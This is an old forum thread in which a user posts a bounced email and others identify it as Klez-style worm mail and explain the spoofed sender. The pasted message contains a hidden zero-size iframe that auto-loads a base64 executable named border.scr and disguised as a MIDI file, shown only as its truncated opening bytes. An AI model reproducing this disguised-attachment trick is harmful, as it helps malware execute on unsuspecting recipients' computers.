Results 1 to 9 of 9

Thread: What's this?.

  1. #1
    Join Date
    Jun 2002
    Posts
    1,210

    What's this?.

    Woke up yesterday and found two returned emails and then two others this morning.
    This is what it is.
    This is a MIME-encapsulated message

    Reporting-MTA: dns; rly-ip04.mx.aol.com
    Arrival-Date: Wed, 21 Aug 2002 01:04:14 -0400 (EDT)

    Final-Recipient: RFC822; [email protected]
    Action: failed
    Status: 5.1.1
    Remote-MTA: DNS; mx07.hotmail.com
    Diagnostic-Code: SMTP; 550 Requested action not taken: mailbox unavailable
    Last-Attempt-Date: Wed, 21 Aug 2002 01:05:01 -0400 (EDT)


    --------------------------------------------------------------------------------
    Received: from logs-mtc-tb.proxy.aol.com (logs-mtc-tb.proxy.aol.com [64.12.104.5]) by rly-ip04.mx.aol.com (v87.21) with ESMTP id RELAYIN10-0821010414; Wed, 21 Aug 2002 01:04:14 -0400
    Received: from Agdcb (ACA1B479.ipt.aol.com [172.161.180.121])
    by logs-mtc-tb.proxy.aol.com (8.10.0/8.10.0) with SMTP id g7L53TE74090
    for <[email protected]>; Wed, 21 Aug 2002 01:03:29 -0400 (EDT)
    Date: Wed, 21 Aug 2002 01:03:29 -0400 (EDT)
    Message-Id: <[email protected]>
    From: salesandservice <[email protected]>
    To: [email protected]
    Subject: END OF WEBTRENDS LIVE TAG
    MIME-Version: 1.0
    Content-Type: multipart/alternative;
    boundary=FA6sszb0Sm697GW60
    X-Apparently-From: [email protected]

    --FA6sszb0Sm697GW60
    Content-Type: text/html;
    Content-Transfer-Encoding: quoted-printable

    <HTML><HEAD></HEAD><BODY>
    <iframe src=3Dcid:BRg787st3INHou height=3D0 width=3D0>
    </iframe>
    <FONT></FONT></BODY></HTML>

    --FA6sszb0Sm697GW60
    Content-Type: audio/x-midi;
    name=border.scr
    Content-Transfer-Encoding: base64
    Content-ID: <BRg787st3INHou>

    TVqQAAMAAAAEAAAA//8AALgAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
    AAAAAAAA2AAAAA4fug4AtAnNIbgBTM0hVGhpcyBwcm9ncmFtIGNhbm5vdCBiZSBydW4gaW4g
    RE9TIG1vZGUuDQ0KJAAAAAAAAAAYmX3gXPgTs1z4E7Nc+BOzJ+Qfs1j4E7Pf5B2zT/gTs7Tn
    GbNm+BOzPucAs1X4E7Nc+BKzJfgTs7TnGLNO+BOz5P4Vs134E7NSaWNoXPgTswAAAAAAAAAA
    UEUAAEwBBAC4jrc8AAAAAAAAAADgAA8BCwEGAADAAAAAkAgAAAAAAFiEAAAAEAAAANAAAAAA
    QAAAEAAAABAAAAQAAAAAAAAABAAAAAAAAAAAYAkAABAAAAAAAAACAAAAAAAQAAAQAAAAABAA
    ABAAAAAAAAAQAAAAAAAAAAAAAAAg1gAAZAAAAABQCQAQAAAAAAAAAAAAAAAAAAAAAAAAAAAA
    AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
    ANAAAOwBAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAudGV4dAAAAEq6AAAAEAAAAMAAAAAQ
    AAAAAAAAAAAAAAAAAAAgAABgLnJkYXRhAAAiEAAAANAAAAAgAAAA0AAAAAAAAAAAAAAAAAAA
    QAAAQC5kYXRhAAAAbF4IAADwAAAAUAAAAPAAAAAAAAAAAAAAAAAAAEAAAMAucnNyYwAAABAA
    AAAAUAkAEAAAAABAAQAAAAAAAAAAAAAAAABAAABAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
    AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
    AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA

    These A's and other letters go on for ages, anyone have no idea?.
    Professor of crime at St Andrews university.

  2. #2
    Join Date
    Jan 2002
    Posts
    453
    Content-Type: audio/x-midi;
    name=border.scr
    Content-Transfer-Encoding: base64
    Content-ID: <BRg787st3INHou>


    someones trying to send you a virus.. .

    .scr is the extension for a screensaver , it executes if you save that and click on it.

    its definately not midi because it would have .mid at the end if it was.

  3. #3
    Join Date
    Jun 2002
    Location
    Texas
    Posts
    7,953
    Most liklely the persistant klez virus. Our company is still gets multiple klez infected emails daily

  4. #4
    Join Date
    Jun 2002
    Posts
    1,210
    So guys do you think it was sent on purpose or maybe a yes or no?.
    Professor of crime at St Andrews university.

  5. #5
    Join Date
    Jul 2002
    Location
    Tasmania, Australia
    Posts
    34,796
    As it was returned mail, someone who has you on their mailing list has the virus. The Klez virus puts a random addressee in the 'from' field, in these two cases it was you. The email didn't reach the intended recipient, so it was returned to *you*. I get a couple of these returned mail thingies every day

  6. #6
    Join Date
    Jun 2002
    Location
    Texas
    Posts
    7,953
    Some one has an ex employee email address in thier address book. The address in still recieved via catch all setting. Between that and the returned emails I receive 10-20 on a daily basis.

  7. #7
    Join Date
    Aug 2002
    Location
    deville
    Posts
    214
    This is a virus sent to spread it. Not necessarily your ex-employee...anybody can send you the virus and it is not only you... the person must have sent to many others alongwith you from the source he found your email address from. Make it a habbit to run your antivirus system on a daily basis.

  8. #8
    Join Date
    Jun 2002
    Location
    Texas
    Posts
    7,953
    Yeah antivirus stops it. It is still annoying. I have tracked down the ISP the mail coming from and I inform thier abuse department everyday. I am sure it is someone who had our employee and some shared trade emails in their address book.

  9. #9
    Join Date
    May 2002
    Location
    Michigan
    Posts
    1,799
    I get those virri all the time.
    It sends itself out to random addys it finds on the infected computer, and uses random addys it finds on the infected computer in the from feild of the emails it sends.
    Obvioulsy your email addy was in the from feild when it was sent from the infected computer to a non exsistant email address. Thats why you got the 'returned' email.
    Just delete it.
    DANG DANG! DANG!!
    I know ***** ripped off everybody else, but they wouldn't do it to me.
    "When you use bottom feed for bait, you are only going to catch bottom feeders."
    "You do what you are, and you are what you do."

Posting Permissions

  • You may not post new threads
  • You may not post replies
  • You may not post attachments
  • You may not edit your posts
  •